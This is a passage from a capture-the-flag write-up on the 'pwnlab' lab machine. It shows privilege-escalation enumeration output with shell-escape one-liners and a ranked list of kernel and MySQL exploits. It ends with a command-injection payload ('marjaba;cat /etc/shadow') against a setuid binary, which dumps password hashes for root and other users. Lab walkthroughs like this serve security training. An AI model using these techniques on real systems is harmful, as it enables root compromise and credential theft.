linux-libc-dev:i386 3.16.7-ckt20-1+deb8u4 Linux support headers for userspace development
locales 2.19-18+deb8u3 GNU C Library: National Language (locale) data [support]
login 1:4.2-3+deb8u1 system login tools
logrotate 3.8.7-1+b1 Log rotation utility
lsb-base 4.1+Debian13+nmu1 Linux Standard Base 4.1 init script functionality
lsb-release 4.1+Debian13+nmu1 Linux Standard Base version reporting utility
lsof 4.86+dfsg-1 Utility to list open files
m4 1.4.17-4 macro processing language
man-db 2.7.0.2-5 on-line manual pager
manpages 3.74-1 Manual pages about using a GNU/Linux system
manpages-dev 3.74-1 Manual pages about using GNU/Linux for development
mawk 1.3.3-17 a pattern scanning and text processing language
mime-support 3.58 MIME files 'mime.types' & 'mailcap', and support programs
mlocate 0.26-1 quickly find files on the filesystem based on their name
mount 2.25.2-6 Tools for mounting and manipulating filesystems
multiarch-support 2.19-18+deb8u3 Transitional package to ensure multiarch compatibility
mutt 1.5.23-3 text-based mailreader supporting MIME, GPG, PGP and threading
mysql-client 5.5.47-0+deb8u1 MySQL database client (metapackage depending on the latest version)
mysql-client-5.5 5.5.47-0+deb8u1 MySQL database client binaries
mysql-common 5.5.47-0+deb8u1 MySQL database common files, e.g. /etc/mysql/my.cnf
mysql-server 5.5.47-0+deb8u1 MySQL database server (metapackage depending on the latest version)
mysql-server-5.5 5.5.47-0+deb8u1 MySQL database server binaries and system database setup
mysql-server-core-5.5 5.5.47-0+deb8u1 MySQL database server binaries
nano 2.2.6-3 small, friendly text editor inspired by Pico
ncurses-base 5.9+20140913-1 basic terminal type definitions
ncurses-bin 5.9+20140913-1+b1 terminal-related programs and man pages
ncurses-term 5.9+20140913-1 additional terminal type definitions
net-tools 1.60-26+b1 NET-3 networking toolkit
netbase 5.3 Basic TCP/IP networking system
netcat-traditional 1.10-41 TCP/IP swiss army knife
nfacct 1.0.1-1.1 netfilter accounting object tool
nfs-common 1:1.2.8-9 NFS support files common to client and server
openssh-client 1:6.7p1-5+deb8u1 secure shell (SSH) client, for secure access to remote machines
openssl 1.0.1k-3+deb8u4 Secure Sockets Layer toolkit - cryptographic utility
os-prober 1.65 utility to detect other OSes on a set of drives
passwd 1:4.2-3+deb8u1 change and administer password and group data
patch 2.7.5-1 Apply a diff file to an original
pciutils 1:3.2.1-3 Linux PCI Utilities
perl 5.20.2-3+deb8u4 Larry Wall's Practical Extraction and Report Language
perl-base 5.20.2-3+deb8u4 minimal Perl system
perl-modules 5.20.2-3+deb8u4 Core Perl modules
php5 5.6.17+dfsg-0+deb8u1 server-side, HTML-embedded scripting language (metapackage)
php5-cli 5.6.17+dfsg-0+deb8u1 command-line interpreter for the php5 scripting language
php5-common 5.6.17+dfsg-0+deb8u1 Common files for packages built from the php5 source
php5-json 1.3.6-1 JSON module for php5
php5-mysql 5.6.17+dfsg-0+deb8u1 MySQL module for php5
php5-readline 5.6.17+dfsg-0+deb8u1 Readline module for php5
pinentry-gtk2 0.8.3-2 GTK+-2-based PIN or pass-phrase entry dialog for GnuPG
procmail 3.22-24 Versatile e-mail processor
procps 2:3.3.9-9 /proc file system utilities
psmisc 22.21-2 utilities that use the proc file system
python 2.7.9-1 interactive high-level object-oriented language (default version)
python-apt 0.9.3.12 Python interface to libapt-pkg
python-apt-common 0.9.3.12 Python interface to libapt-pkg (locales)
python-chardet 2.3.0-1 universal character encoding detector for Python2
python-debian 0.1.27 Python modules to work with Debian-related data formats
python-debianbts 1.12 Python interface to Debian's Bug Tracking System
python-defusedxml 0.4.1-2 XML bomb protection for Python stdlib modules (for Python 2)
python-docutils 0.12+dfsg-1 text processing system for reStructuredText (implemented in Python 2)
python-minimal 2.7.9-1 minimal subset of the Python language (default version)
python-pil:i386 2.6.1-2+deb8u2 Python Imaging Library (Pillow fork)
python-pkg-resources 5.5.1-1 Package Discovery and Resource Access using pkg_resources
python-pygments 2.0.1+dfsg-1.1+deb8u1 syntax highlighting package written in Python
python-reportbug 6.6.3 Python modules for interacting with bug tracking systems
python-roman 2.0.0-1 module for generating/analyzing Roman numerals for Python 2
python-six 1.8.0-1 Python 2 and 3 compatibility library (Python 2 interface)
python-soappy 0.12.22-1 SOAP Support for Python
python-support 1.0.15 automated rebuilding support for Python modules
python-wstools 0.4.3-2 WSDL parsing tools Python module
python2.7 2.7.9-2 Interactive high-level object-oriented language (version 2.7)
python2.7-minimal 2.7.9-2 Minimal subset of the Python language (version 2.7)
readline-common 6.3-8 GNU readline and history libraries, common files
rename 0.20-3 Perl extension for renaming multiple files
reportbug 6.6.3 reports bugs in the Debian distribution
rpcbind 0.2.1-6+deb8u1 converts RPC program numbers into universal addresses
rsyslog 8.4.2-1+deb8u2 reliable system and kernel logging daemon
sed 4.2.2-4+b1 The GNU sed stream editor
sensible-utils 0.0.9 Utilities for sensible alternative selection
sgml-base 1.26+nmu4 SGML infrastructure and SGML catalog file support
shared-mime-info 1.3-1 FreeDesktop.org shared MIME database and spec
ssl-cert 1.0.35 simple debconf wrapper for OpenSSL
startpar 0.59-3 run processes in parallel and multiplex their output
systemd 215-17+deb8u3 system and service manager
systemd-sysv 215-17+deb8u3 system and service manager - SysV links
sysv-rc 2.88dsf-59 System-V-like runlevel change mechanism
sysvinit-utils 2.88dsf-59 System-V-like utilities
tar 1.27.1-2+b1 GNU version of the tar archiving utility
task-english 3.31+deb8u1 General English environment
tasksel 3.31+deb8u1 tool for selecting tasks for installation on Debian systems
tasksel-data 3.31+deb8u1 official tasks used for installation of Debian systems
tcpd 7.6.q-25 Wietse Venema's TCP wrapper utilities
telnet 0.17-36 The telnet client
texinfo 5.2.0.dfsg.1-6 Documentation system for on-line information and printed output
time 1.7-25 GNU time program for measuring CPU resource usage
traceroute 1:2.0.20-2+b1 Traces the route taken by packets over an IPv4/IPv6 network
tzdata 2015g-0+deb8u1 time zone and daylight-saving time data
ucf 3.0030 Update Configuration File(s): preserve user changes to config files
udev 215-17+deb8u3 /dev/ and hotplug management daemon
usbutils 1:007-2 Linux USB utilities
util-linux 2.25.2-6 Miscellaneous system utilities
util-linux-locales 2.25.2-6 Locales files for util-linux
vim-common 2:7.4.488-7 Vi IMproved - Common files
vim-tiny 2:7.4.488-7 Vi IMproved - enhanced vi editor - compact version
w3m 0.5.3-19 WWW browsable pager with excellent tables/frames support
wamerican 7.1-1 American English dictionary words for /usr/share/dict
wget 1.16-1 retrieves files from the web
whiptail 0.52.17-1+b1 Displays user-friendly dialog boxes from shell scripts
whois 5.2.7 intelligent WHOIS client
xauth 1:1.0.9-1 X authentication utility
xdg-user-dirs 0.15-2 tool to manage well known user directories
xkb-data 2.12-1 X Keyboard Extension (XKB) configuration data
xml-core 0.13+nmu2 XML infrastructure and XML catalog file support
xz-utils 5.1.1alpha+20120614-2+b3 XZ-format compression utilities
zlib1g:i386 1:1.2.8.dfsg-2+b1 compression library - runtime
[+] Current processes
USER PID START TIME COMMAND
root 1 Oct04 0:01 /sbin/init
root 2 Oct04 0:00 [kthreadd]
root 3 Oct04 1:10 [ksoftirqd/0]
root 5 Oct04 0:00 [kworker/0:0H]
root 7 Oct04 0:05 [rcu_sched]
root 8 Oct04 0:00 [rcu_bh]
root 9 Oct04 0:00 [migration/0]
root 10 Oct04 0:04 [watchdog/0]
root 11 Oct04 0:00 [khelper]
root 12 Oct04 0:00 [kdevtmpfs]
root 13 Oct04 0:00 [netns]
root 14 Oct04 0:00 [khungtaskd]
root 15 Oct04 0:00 [writeback]
root 16 Oct04 0:00 [ksmd]
root 17 Oct04 0:00 [crypto]
root 18 Oct04 0:00 [kintegrityd]
root 19 Oct04 0:00 [bioset]
root 20 Oct04 0:00 [kblockd]
root 22 Oct04 0:00 [kswapd0]
root 23 Oct04 0:00 [fsnotify_mark]
root 29 Oct04 0:00 [kthrotld]
root 30 Oct04 0:00 [ipv6_addrconf]
root 31 Oct04 0:00 [deferwq]
root 66 Oct04 0:00 [khubd]
root 67 Oct04 0:00 [mpt_poll_0]
root 68 Oct04 0:00 [mpt/0]
root 69 Oct04 0:00 [scsi_eh_0]
root 70 Oct04 0:00 [scsi_tmf_0]
root 71 Oct04 0:16 [kworker/u2:2]
root 74 Oct04 0:00 [kworker/0:1H]
root 95 Oct04 0:00 [jbd2/sda1-8]
root 96 Oct04 0:00 [ext4-rsv-conver]
root 126 Oct04 0:00 [kauditd]
root 127 Oct04 0:00 /lib/systemd/systemd-journald
root 136 Oct04 0:00 /lib/systemd/systemd-udevd
root 169 Oct04 0:00 [kpsmoused]
root 222 Oct04 0:00 [kworker/0:4]
root 344 Oct04 0:00 /sbin/rpcbind
statd 368 Oct04 0:00 /sbin/rpc.statd
root 373 Oct04 0:00 [rpciod]
root 375 Oct04 0:00 [nfsiod]
root 382 Oct04 0:00 /usr/sbin/rpc.idmapd
root 383 Oct04 0:00 /usr/sbin/cron
daemon 384 Oct04 0:00 /usr/sbin/atd
root 386 Oct04 0:00 /lib/systemd/systemd-logind
message+ 389 Oct04 0:00 /usr/bin/dbus-daemon
root 407 Oct04 0:00 /usr/sbin/rsyslogd
root 409 Oct04 0:00 /usr/sbin/acpid
root 419 Oct04 0:00 /sbin/agetty
root 441 Oct04 0:00 /bin/sh
root 482 Oct04 0:12 /usr/sbin/apache2
www-data 650 Oct04 0:40 /usr/sbin/apache2
www-data 651 Oct04 0:50 /usr/sbin/apache2
www-data 652 Oct04 0:40 /usr/sbin/apache2
www-data 653 Oct04 0:47 /usr/sbin/apache2
mysql 790 Oct04 1:11 /usr/sbin/mysqld
www-data 1125 Oct04 0:00 /bin/sh
www-data 1126 Oct04 0:00 python
www-data 1127 Oct04 0:00 /bin/bash
Debian-+ 1140 Oct04 0:00 /usr/sbin/exim4
root 1198 Oct04 0:00 dhclient
www-data 1213 Oct04 0:49 /usr/sbin/apache2
root 1244 Oct04 2:16 [kworker/0:0]
www-data 1251 Oct04 0:40 /usr/sbin/apache2
www-data 1253 Oct04 0:39 /usr/sbin/apache2
www-data 1255 Oct04 0:39 /usr/sbin/apache2
www-data 1259 Oct04 0:41 /usr/sbin/apache2
root 1435 Oct04 0:00 procmail
www-data 1436 Oct04 0:00 sh
www-data 1437 Oct04 0:00 /bin/sh
www-data 1438 Oct04 0:00 python
www-data 1439 Oct04 0:00 /bin/bash
root 1517 Oct04 0:00 su
kent 1518 Oct04 0:00 bash
root 1716 Oct04 0:00 su
kane 1717 Oct04 0:00 bash
root 1916 Oct04 0:00 su
kent 1917 Oct04 0:00 bash
root 1923 Oct04 0:00 su
kane 1924 Oct04 0:00 bash
www-data 1938 Oct04 0:00 /usr/sbin/apache2
www-data 1939 Oct04 0:00 /usr/sbin/apache2
root 1968 Oct04 0:00 su
kent 1969 Oct04 0:00 bash
root 1987 Oct04 0:00 su
kane 1988 Oct04 0:00 bash
www-data 2167 Oct04 0:00 /bin/sh
www-data 2168 Oct04 0:00 python
www-data 2169 Oct04 0:00 /bin/bash
root 2170 Oct04 0:00 su
kent 2171 Oct04 0:00 bash
root 2177 Oct04 0:00 su
kane 2178 Oct04 0:00 bash
mike 2195 Oct04 0:00 ./msgmike
mike 2196 Oct04 0:00 sh
mike 2197 Oct04 0:00 /bin/sh
mike 2198 Oct04 0:00 bash
mike 2200 Oct04 0:00 python
mike 2201 Oct04 0:00 /bin/bash
root 2470 Oct04 0:00 ./msg2root
root 2471 Oct04 0:00 sh
mike 2473 Oct04 0:00 bash
mike 2476 Oct04 0:00 python
mike 2477 Oct04 0:00 /bin/bash
www-data 2484 Oct04 0:00 /bin/sh
www-data 2487 Oct04 0:00 python
www-data 2488 Oct04 0:00 /bin/bash
root 2489 Oct04 0:00 su
kane 2490 Oct04 0:00 bash
mike 2500 Oct04 0:00 ./msgmike
mike 2501 Oct04 0:00 sh
mike 2502 Oct04 0:00 /bin/sh
mike 2503 Oct04 0:00 bash
mike 2504 Oct04 0:00 python
mike 2505 Oct04 0:00 /bin/bash
root 2512 Oct04 0:00 ./msg2root
root 2513 Oct04 0:00 sh
mike 2515 Oct04 0:00 /bin/bash
root 2523 Oct04 0:00 ./msg2root
root 2527 Oct04 0:00 sh
root 2529 Oct04 0:00 /bin/sh
www-data 2561 Oct04 0:00 /bin/sh
www-data 2563 Oct04 0:00 python
www-data 2564 Oct04 0:00 /bin/bash
root 2565 Oct04 0:00 su
kane 2566 Oct04 0:00 bash
mike 2574 Oct04 0:00 ./msgmike
mike 2575 Oct04 0:00 sh
mike 2576 Oct04 0:00 /bin/sh
mike 2577 Oct04 0:00 bash
mike 2578 Oct04 0:00 python
mike 2579 Oct04 0:00 /bin/bash
root 2587 Oct04 0:00 ./msg2root
root 2588 Oct04 0:00 sh
mike 2590 Oct04 0:00 bash
mike 2592 Oct04 0:00 python
mike 2593 Oct04 0:00 /bin/bash
www-data 2601 Oct04 0:00 /bin/sh
www-data 2603 Oct04 0:00 python
www-data 2604 Oct04 0:00 /bin/bash
root 2605 Oct04 0:00 su
kane 2606 Oct04 0:00 bash
mike 2611 Oct04 0:00 ./msgmike
mike 2612 Oct04 0:00 sh
mike 2613 Oct04 0:00 /bin/sh
mike 2614 Oct04 0:00 bash
mike 2615 Oct04 0:00 python
mike 2616 Oct04 0:00 /bin/bash
www-data 2665 Oct04 0:00 /bin/sh
www-data 2666 Oct04 0:00 /bin/sh
www-data 2668 Oct04 0:00 python
www-data 2669 Oct04 0:00 /bin/bash
root 2670 Oct04 0:00 su
kane 2671 Oct04 0:00 bash
root 2771 Oct04 0:00 [kworker/u2:0]
www-data 2841 00:16 0:00 [sh]
www-data 2842 00:16 0:00 /bin/sh
www-data 2843 00:16 0:00 python
www-data 2844 00:16 0:00 /bin/bash
root 2848 00:17 0:00 su
kane 2849 00:17 0:00 bash
www-data 2861 00:20 0:00 [sh]
www-data 2862 00:20 0:00 /bin/sh
www-data 2863 00:20 0:00 python
www-data 2864 00:20 0:00 /bin/bash
root 2865 00:20 0:00 su
kane 2866 00:20 0:00 bash
www-data 2874 00:21 0:00 [sh]
www-data 2875 00:21 0:00 /bin/sh
www-data 2876 00:21 0:00 python
www-data 2877 00:21 0:00 /bin/bash
root 2878 00:21 0:00 su
kane 2879 00:21 0:00 bash
www-data 3068 00:22 0:00 sh
www-data 3069 00:22 0:00 /bin/sh
www-data 3070 00:22 0:00 python
www-data 3071 00:22 0:00 /bin/bash
root 3072 00:22 0:00 su
kane 3073 00:23 0:00 bash
mike 3267 00:25 0:00 ./msgmike
mike 3268 00:25 0:00 sh
mike 3269 00:25 0:00 /bin/sh
mike 3270 00:25 0:00 sh
mike 3271 00:27 0:00 python
mike 3272 00:27 0:00 /bin/bash
mike 3279 00:29 0:00 python
mike 3450 00:29 0:00 /bin/sh
mike 3451 00:29 0:00 ps
mike 3452 00:29 0:00 awk
[+] Apache Version and Modules
[+] Apache Config File
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.4/ for detailed information about
# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
# hints.
#
#
# Summary of how the Apache 2 configuration works in Debian:
# The Apache 2 web server configuration in Debian is quite different to
# upstream's suggested way to configure the web server. This is because Debian's
# default Apache2 installation attempts to make adding and removing modules,
# virtual hosts, and extra configuration directives as flexible as possible, in
# order to make automating the changes and administering the server as easy as
# possible.
# It is split into several files forming the configuration hierarchy outlined
# below, all located in the /etc/apache2/ directory:
#
# /etc/apache2/
# |-- apache2.conf
# | `-- ports.conf
# |-- mods-enabled
# | |-- *.load
# | `-- *.conf
# |-- conf-enabled
# | `-- *.conf
# `-- sites-enabled
# `-- *.conf
#
#
# * apache2.conf is the main configuration file (this file). It puts the pieces
# together by including all remaining configuration files when starting up the
# web server.
#
# * ports.conf is always included from the main configuration file. It is
# supposed to determine listening ports for incoming connections which can be
# customized anytime.
#
# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
# directories contain particular configuration snippets which manage modules,
# global configuration fragments, or virtual host configurations,
# respectively.
#
# They are activated by symlinking available configuration files from their
# respective *-available/ counterparts. These should be managed by using our
# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
# their respective man pages for detailed information.
#
# * The binary is called apache2. Due to the use of environment variables, in
# the default configuration, apache2 needs to be started/stopped with
# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
# work with the default configuration.
# Global configuration
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the Mutex documentation (available
# at );
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
#ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
Mutex file:${APACHE_LOCK_DIR} default
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 5
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog ${APACHE_LOG_DIR}/error.log
#
# LogLevel: Control the severity of messages logged to the error_log.
# Available values: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the log level for particular modules, e.g.
# "LogLevel info ssl:warn"
#
LogLevel warn
# Include module configuration:
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
# Include list of ports to listen on
Include ports.conf
# Sets the default security model of the Apache2 HTTPD server. It does
# not allow access to the root filesystem outside of /usr/share and /var/www.
# The former is used by web applications packaged in Debian,
# the latter may be used for local directories served by the web server. If
# your system is serving content from a sub-directory in /srv you must allow
# access here, or in any related virtual host.
AllowOverride None
Require all granted
Require all denied
#
# The following directives define some format nicknames for use with
# a CustomLog directive.
#
# These deviate from the Common Log Format definitions in that they use %O
# (the actual bytes sent including headers) instead of %b (the size of the
# requested file), because the latter makes it impossible to detect partial
# requests.
#
# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
# Use mod_remoteip instead.
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
[+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
root 2587 Oct04 0:00 ./msg2root
root 1916 Oct04 0:00 su
root 126 Oct04 0:00 [kauditd]
root 2527 Oct04 0:00 sh
root 29 Oct04 0:00 [kthrotld]
root 2470 Oct04 0:00 ./msg2root
root 8 Oct04 0:00 [rcu_bh]
root 30 Oct04 0:00 [ipv6_addrconf]
root 13 Oct04 0:00 [netns]
root 383 Oct04 0:00 /usr/sbin/cron
Possible Related Packages:
cron 3.0pl1-127+deb8u1 process scheduling daemon
root 15 Oct04 0:00 [writeback]
root 2605 Oct04 0:00 su
root 2529 Oct04 0:00 /bin/sh
root 22 Oct04 0:00 [kswapd0]
root 482 Oct04 0:12 /usr/sbin/apache2
Possible Related Packages:
apache2 2.4.10-10+deb8u4 Apache HTTP Server
apache2-bin 2.4.10-10+deb8u4 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.10-10+deb8u4 Apache HTTP Server (common files)
apache2-utils 2.4.10-10+deb8u4 Apache HTTP Server (utility programs for web servers)
libapache2-mod-php5 5.6.17+dfsg-0+deb8u1 server-side, HTML-embedded scripting language (Apache 2 module)
root 2513 Oct04 0:00 sh
root 2489 Oct04 0:00 su
root 382 Oct04 0:00 /usr/sbin/rpc.idmapd
root 1968 Oct04 0:00 su
root 2670 Oct04 0:00 su
root 70 Oct04 0:00 [scsi_tmf_0]
root 419 Oct04 0:00 /sbin/agetty
root 17 Oct04 0:00 [crypto]
root 2848 00:17 0:00 su
root 127 Oct04 0:00 /lib/systemd/systemd-journald
root 5 Oct04 0:00 [kworker/0:0H]
root 20 Oct04 0:00 [kblockd]
root 71 Oct04 0:16 [kworker/u2:2]
root 344 Oct04 0:00 /sbin/rpcbind
Possible Related Packages:
rpcbind 0.2.1-6+deb8u1 converts RPC program numbers into universal addresses
root 1716 Oct04 0:00 su
root 2878 00:21 0:00 su
root 3 Oct04 1:10 [ksoftirqd/0]
root 407 Oct04 0:00 /usr/sbin/rsyslogd
root 2865 00:20 0:00 su
root 16 Oct04 0:00 [ksmd]
root 2471 Oct04 0:00 sh
root 1517 Oct04 0:00 su
root 2771 Oct04 0:00 [kworker/u2:0]
root 375 Oct04 0:00 [nfsiod]
root 1987 Oct04 0:00 su
root 31 Oct04 0:00 [deferwq]
root 386 Oct04 0:00 /lib/systemd/systemd-logind
root 2 Oct04 0:00 [kthreadd]
root 373 Oct04 0:00 [rpciod]
root 1244 Oct04 2:16 [kworker/0:0]
root 95 Oct04 0:00 [jbd2/sda1-8]
root 2588 Oct04 0:00 sh
root 10 Oct04 0:04 [watchdog/0]
root 18 Oct04 0:00 [kintegrityd]
root 1198 Oct04 0:00 dhclient
root 2170 Oct04 0:00 su
root 23 Oct04 0:00 [fsnotify_mark]
root 1 Oct04 0:01 /sbin/init
Possible Related Packages:
init 1.22 System-V-like init utilities - metapackage
init-system-helpers 1.22 helper tools for all init systems
initramfs-tools 0.120 generic modular initramfs generator
initscripts 2.88dsf-59 scripts for initializing and shutting down the system
insserv 1.14.0-5 boot sequence organizer using LSB init.d script dependency information
libklibc 2.0.4-2 minimal libc subset for use with initramfs
lsb-base 4.1+Debian13+nmu1 Linux Standard Base 4.1 init script functionality
ncurses-base 5.9+20140913-1 basic terminal type definitions
ncurses-term 5.9+20140913-1 additional terminal type definitions
sysvinit-utils 2.88dsf-59 System-V-like utilities
root 3072 00:22 0:00 su
root 68 Oct04 0:00 [mpt/0]
root 19 Oct04 0:00 [bioset]
root 14 Oct04 0:00 [khungtaskd]
root 7 Oct04 0:05 [rcu_sched]
root 1923 Oct04 0:00 su
root 2523 Oct04 0:00 ./msg2root
root 67 Oct04 0:00 [mpt_poll_0]
root 2177 Oct04 0:00 su
root 409 Oct04 0:00 /usr/sbin/acpid
Possible Related Packages:
acpid 1:2.0.23-2 Advanced Configuration and Power Interface event daemon
root 74 Oct04 0:00 [kworker/0:1H]
root 2512 Oct04 0:00 ./msg2root
root 1435 Oct04 0:00 procmail
Possible Related Packages:
procmail 3.22-24 Versatile e-mail processor
root 12 Oct04 0:00 [kdevtmpfs]
root 69 Oct04 0:00 [scsi_eh_0]
root 169 Oct04 0:00 [kpsmoused]
root 2565 Oct04 0:00 su
root 66 Oct04 0:00 [khubd]
root 9 Oct04 0:00 [migration/0]
root 96 Oct04 0:00 [ext4-rsv-conver]
root 222 Oct04 0:00 [kworker/0:4]
root 441 Oct04 0:00 /bin/sh
root 11 Oct04 0:00 [khelper]
root 136 Oct04 0:00 /lib/systemd/systemd-udevd
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
/usr/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/gcc
/usr/bin/cc
/usr/bin/vi
/usr/bin/find
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/ftp
[+] Related Shell Escape Sequences...
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || http://www.exploit-db.com/exploits/5720 || Language=python
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
Finished
=================================================================================================
I found a file that is owned by root and can be executed under mike's privileges:
mike@pwnlab:/var/www/html/upload$ cd /home/mike;ls -l cd /home/mike;ls -l total 8 -rwsr-sr-x 1 root root 5364 Mar 17 2016 msg2root mike@pwnlab:/home/mike$ file msg2root file msg2root msg2root: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=60bf769f8fbbfd406c047f698b55d2668fae14d3, not stripped mike@pwnlab:/home/mike$ strings msg2root strings msg2root /lib/ld-linux.so.2 libc.so.6 _IO_stdin_used stdin fgets asprintf system __libc_start_main __gmon_start__ GLIBC_2.0 PTRh [^_] Message for root: /bin/echo %s >> /root/messages.txt ;*2$"( GCC: (Debian 4.9.2-10) 4.9.2 GCC: (Debian 4.8.4-1) 4.8.4 .symtab .strtab .shstrtab .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss .comment crtstuff.c __JCR_LIST__ deregister_tm_clones register_tm_clones __do_global_dtors_aux completed.6279 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry msg2root.c __FRAME_END__ __JCR_END__ __init_array_end _DYNAMIC __init_array_start _GLOBAL_OFFSET_TABLE_ __libc_csu_fini _ITM_deregisterTMCloneTable __x86.get_pc_thunk.bx data_start printf@@GLIBC_2.0 fgets@@GLIBC_2.0 _edata _fini __data_start system@@GLIBC_2.0 __gmon_start__ __dso_handle _IO_stdin_used __libc_start_main@@GLIBC_2.0 __libc_csu_init stdin@@GLIBC_2.0 _end _start _fp_hw asprintf@@GLIBC_2.0 __bss_start main _Jv_RegisterClasses __TMC_END__ _ITM_registerTMCloneTable _init
Using strings, i discovered that this file is sending a string to root (/bin/echo %s >> /root/messages.txt).
I found a command execution using root permissions:
mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: marjaba marjaba marjaba mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: marjaba;cat /etc/shadow marjaba;cat /etc/shadow marjaba root:$6$aYZMZ3V0$qAYwiR7aanVmKSWyV5IbRffspdjFx4xhLrm8kbHhh1DG16Bdb0/ptImcDK2uT.6xc/FZotacYr0X4dB0SurjD/:16877:0:99999:7::: daemon:*:16877:0:99999:7::: bin:*:16877:0:99999:7::: sys:*:16877:0:99999:7::: sync:*:16877:0:99999:7::: games:*:16877:0:99999:7::: man:*:16877:0:99999:7::: lp:*:16877:0:99999:7::: mail:*:16877:0:99999:7::: news:*:16877:0:99999:7::: uucp:*:16877:0:99999:7::: proxy:*:16877:0:99999:7::: www-data:*:16877:0:99999:7::: backup:*:16877:0:99999:7::: list:*:16877:0:99999:7::: irc:*:16877:0:99999:7::: gnats:*:16877:0:99999:7::: nobody:*:16877:0:99999:7::: systemd-timesync:*:16877:0:99999:7::: systemd-network:*:16877:0:99999:7::: systemd-resolve:*:16877:0:99999:7::: systemd-bus-proxy:*:16877:0:99999:7::: Debian-exim:!:16877:0:99999:7::: messagebus:*:16877:0:99999:7::: statd:*:16877:0:99999:7::: john:$6$uCl.CX5S$tRfy/uCPpATIpz3fG/N51QvjKG46xbr08jpHYvTX5eQO9F/8DoMIAXojVdq/jBgqxN1V2g.pijgV.CzjOurEn.:16877:0:99999:7::: kent:$6$C5PKHyBO$U6/PcF5dUwuxQ2vESedp1V765lM8fY7TY2TFxFNQmE6TAVaSn5zR9BUR9Ozrz.pXt/5jdC9g5FvhGaSWyio.a0:16877:0:99999:7::: 